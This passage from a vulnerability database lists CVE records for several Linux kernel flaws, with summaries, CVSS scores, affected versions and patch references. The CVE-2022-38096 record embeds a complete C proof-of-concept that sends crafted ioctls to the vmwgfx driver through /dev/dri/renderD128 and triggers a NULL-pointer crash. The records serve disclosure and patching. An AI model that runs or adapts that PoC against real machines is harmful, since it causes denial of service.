"cveId": "CVE-2023-6546",
"datePublished": "2023-12-21T20:01:03.217Z",
"dateReserved": "2023-12-06T07:11:48.937Z",
"dateUpdated": "2025-09-25T13:21:01.062Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-31436 (GCVE-0-2023-31436)
Vulnerability from cvelistv5
Published
2023-04-28 00:00
Modified
2024-10-21 16:01
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T14:53:30.606Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/3037933448f60f9acb705997eae62013ecb81e0d"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/stable-commits/msg294885.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.13"
},
{
"name": "DSA-5402",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5402"
},
{
"name": "[debian-lts-announce] 20230605 [SECURITY] [DLA 3446-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00008.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230609-0001/"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/173087/Kernel-Live-Patch-Security-Notice-LSN-0095-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-31436",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-15T17:15:52.761316Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787 Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-21T16:01:13.471Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-11-29T15:06:30.285764",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/torvalds/linux/commit/3037933448f60f9acb705997eae62013ecb81e0d"
},
{
"url": "https://www.spinics.net/lists/stable-commits/msg294885.html"
},
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.13"
},
{
"name": "DSA-5402",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5402"
},
{
"name": "[debian-lts-announce] 20230605 [SECURITY] [DLA 3446-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00008.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230609-0001/"
},
{
"url": "http://packetstormsecurity.com/files/173087/Kernel-Live-Patch-Security-Notice-LSN-0095-1.html"
},
{
"url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html"
},
{
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-31436",
"datePublished": "2023-04-28T00:00:00",
"dateReserved": "2023-04-28T00:00:00",
"dateUpdated": "2024-10-21T16:01:13.471Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-42896 (GCVE-0-2022-42896)
Vulnerability from cvelistv5
Published
2022-11-23 14:11
Modified
2025-04-21 13:45
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.
We recommend upgrading past commit https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux Kernel |
Version: 3.0.0 < |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T13:19:05.444Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/#711f8c3fb3db61897080468586b970c87c61d9e4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-42896",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-21T13:37:08.196759Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-21T13:45:57.600Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Linux Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "711f8c3fb3db61897080468586b970c87c61d9e4",
"status": "affected",
"version": "3.0.0",
"versionType": "custom"
}
]
}
],
"datePublic": "2022-11-02T23:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThere are use-after-free vulnerabilities in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth.\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\u003c/span\u003e\u003cbr\u003e\u003c/span\u003e\u003c/span\u003e\u003cbr\u003eWe recommend upgrading past commit\u0026nbsp;\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.google.com/url?q=https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u0026amp;sa=D\u0026amp;source=buganizer\u0026amp;usg=AOvVaw1MgsfyPTiSrqqs3LAs-ZRS\"\u003e\u003c/a\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.google.com/url?q=https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4\u0026amp;sa=D\u0026amp;source=buganizer\u0026amp;usg=AOvVaw22K1DH0yRHxuiaUXy9_wmV\"\u003ehttps://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4\u003c/a\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "There are use-after-free vulnerabilities in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth.\u00a0A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\n\nWe recommend upgrading past commit\u00a0 https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url \n\n"
}
],
"impacts": [
{
"capecId": "CAPEC-253",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-253 Remote Code Inclusion"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-23T14:13:44.351Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4"
},
{
"url": "https://kernel.dance/#711f8c3fb3db61897080468586b970c87c61d9e4"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Info Leak in l2cap_core in the Linux Kernel",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2022-42896",
"datePublished": "2022-11-23T14:11:56.811Z",
"dateReserved": "2022-10-12T18:30:19.769Z",
"dateUpdated": "2025-04-21T13:45:57.600Z",
"requesterUserId": "ed9b5bb2-2df1-4aa3-9791-5fb260d88e62",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-38096 (GCVE-0-2022-38096)
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-16 19:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.14",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-38096",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T13:45:25.191519Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T13:49:29.690Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T10:45:52.802Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.13.0-52*",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"datePublic": "2022-09-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
],
"exploits": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:08:05.642043",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
],
"discovery": "INTERNAL"
},
"title": "There is a NULL pointer vulnerability in vmwgfx driver",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2022-38096",
"datePublished": "2022-09-09T14:39:51.163117Z",
"dateReserved": "2022-09-07T00:00:00",
"dateUpdated": "2024-09-16T19:46:43.355Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26602 (GCVE-0-2024-26602)
Vulnerability from cvelistv5
Published
2024-02-24 14:56
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
sched/membarrier: reduce the ability to hammer on sys_membarrier
On some systems, sys_membarrier can be very expensive, causing overall
slowdowns for everything. So put a lock on the path in order to
serialize the accesses to prevent the ability for this to be called at
too high of a frequency and saturate the machine.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26602",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-29T16:20:03.636502Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:51.858Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.594Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/sched/membarrier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3cd139875e9a7688b3fc715264032620812a5fa3",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "2441a64070b85c14eecc3728cc87e883f953f265",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "db896bbe4a9c67cee377e5f6a743350d3ae4acf6",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "50fb4e17df319bb33be6f14e2a856950c1577dee",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "24ec7504a08a67247fbe798d1de995208a8c128a",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "b6a2a9cbb67545c825ec95f06adb7ff300a2ad71",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "c5b2063c65d05e79fad8029324581d86cfba7eea",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "944d5fe50f3f03daacfea16300e656a1691c4a23",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/sched/membarrier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/membarrier: reduce the ability to hammer on sys_membarrier\n\nOn some systems, sys_membarrier can be very expensive, causing overall\nslowdowns for everything. So put a lock on the path in order to\nserialize the accesses to prevent the ability for this to be called at\ntoo high of a frequency and saturate the machine."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:06.429Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3"
},
{
"url": "https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265"
},
{
"url": "https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6"
},
{
"url": "https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee"
},
{
"url": "https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a"
},
{
"url": "https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71"
},
{
"url": "https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea"
},
{
"url": "https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23"
}
],
"title": "sched/membarrier: reduce the ability to hammer on sys_membarrier",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26602",
"datePublished": "2024-02-24T14:56:56.992Z",
"dateReserved": "2024-02-19T14:20:24.128Z",
"dateUpdated": "2025-05-04T08:52:06.429Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-4459 (GCVE-0-2023-4459)
Vulnerability from cvelistv5
Published
2023-08-21 18:49
Modified
2025-10-10 00:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
